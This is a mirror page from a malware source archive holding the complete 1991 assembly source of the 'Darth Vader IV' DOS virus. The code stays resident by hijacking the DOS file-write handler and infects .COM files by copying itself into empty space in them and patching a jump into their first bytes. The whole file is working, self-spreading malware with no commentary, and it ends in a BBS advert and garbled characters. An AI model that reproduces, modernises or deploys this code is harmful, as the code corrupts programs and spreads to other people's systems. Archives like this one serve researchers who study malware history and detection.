mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-05 09:55:27 +00:00
152 lines
2.5 KiB
NASM
152 lines
2.5 KiB
NASM
;******************************************************************************
|
||
;* *
|
||
;* D A R T H V A D E R IV *
|
||
;* *
|
||
;* (C) - Copyright 1991 by Waleri Todorov, CICTT-Sofia *
|
||
;* All Rights Reserved *
|
||
;* *
|
||
;* Enchanced by: Lazy Wizard *
|
||
;* *
|
||
;* Turbo Assembler 2.0 *
|
||
;* *
|
||
;******************************************************************************
|
||
|
||
|
||
|
||
.model tiny
|
||
.code
|
||
|
||
org 100h
|
||
|
||
Start:
|
||
call NextLine
|
||
First3:
|
||
int 20h
|
||
int 3
|
||
NextLine:
|
||
pop bx
|
||
push ax
|
||
xor di,di
|
||
mov es,di
|
||
mov es,es:[2Bh*4+2]
|
||
mov cx,1000h
|
||
call SearchZero
|
||
jc ReturnControl
|
||
xchg ax,si
|
||
inc si
|
||
SearchTable:
|
||
dec si
|
||
db 26h
|
||
lodsw
|
||
cmp ax,8B2Eh
|
||
jne SearchTable
|
||
db 26h
|
||
lodsb
|
||
cmp al,75h
|
||
je ReturnControl
|
||
cmp al,9Fh
|
||
jne SearchTable
|
||
mov si,es:[si]
|
||
mov cx,LastByte-Start
|
||
lea ax,[di+Handle-Start]
|
||
org $-1
|
||
xchg ax,es:[si+80h]
|
||
sub ax,di
|
||
sub ax,cx
|
||
mov [bx+OldWrite-Start-2],ax
|
||
mov word ptr [bx+NewStart+1-Start-3],di
|
||
lea si,[bx-3]
|
||
rep movsb
|
||
ReturnControl:
|
||
pop ax
|
||
push ss
|
||
pop es
|
||
mov di,100h
|
||
lea si,[bx+First3-Start-3]
|
||
push di
|
||
movsw
|
||
movsb
|
||
ret
|
||
SearchZero:
|
||
xor ax,ax
|
||
inc di
|
||
push cx
|
||
push di
|
||
mov cx,(LastByte-Start-1)/2+1
|
||
repe scasw
|
||
pop di
|
||
pop cx
|
||
je FoundPlace
|
||
loop SearchZero
|
||
stc
|
||
FoundPlace:
|
||
ret
|
||
Handle:
|
||
push bp
|
||
call NextHandle
|
||
NextHandle:
|
||
pop bp
|
||
push es
|
||
push ax
|
||
push bx
|
||
push cx
|
||
push si
|
||
push di
|
||
test ch,ch
|
||
je Do
|
||
mov ax,1220h
|
||
int 2Fh
|
||
mov bl,es:[di]
|
||
mov ax,1216h
|
||
int 2Fh
|
||
cmp es:[di+29h],'MO'
|
||
jne Do
|
||
cmp word ptr es:[di+15h],0
|
||
jne Do
|
||
push ds
|
||
pop es
|
||
mov di,dx
|
||
mov ax,[di]
|
||
mov [bp+First3-NextHandle],ax
|
||
mov al,[di+2]
|
||
mov [bp+First3+2-NextHandle],al
|
||
call SearchZero
|
||
jc Do
|
||
push di
|
||
NewStart:
|
||
mov si,0
|
||
mov cx,(LastByte-Start-1)/2
|
||
cli
|
||
rep
|
||
db 36h
|
||
movsw
|
||
sti
|
||
mov di,dx
|
||
mov al,0E9h
|
||
stosb
|
||
pop ax
|
||
sub ax,di
|
||
dec ax
|
||
dec ax
|
||
stosw
|
||
Do:
|
||
pop di
|
||
pop si
|
||
pop cx
|
||
pop bx
|
||
pop ax
|
||
pop es
|
||
pop bp
|
||
OldWrite:
|
||
jmp start
|
||
|
||
LastByte label byte
|
||
|
||
end Start
|
||
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|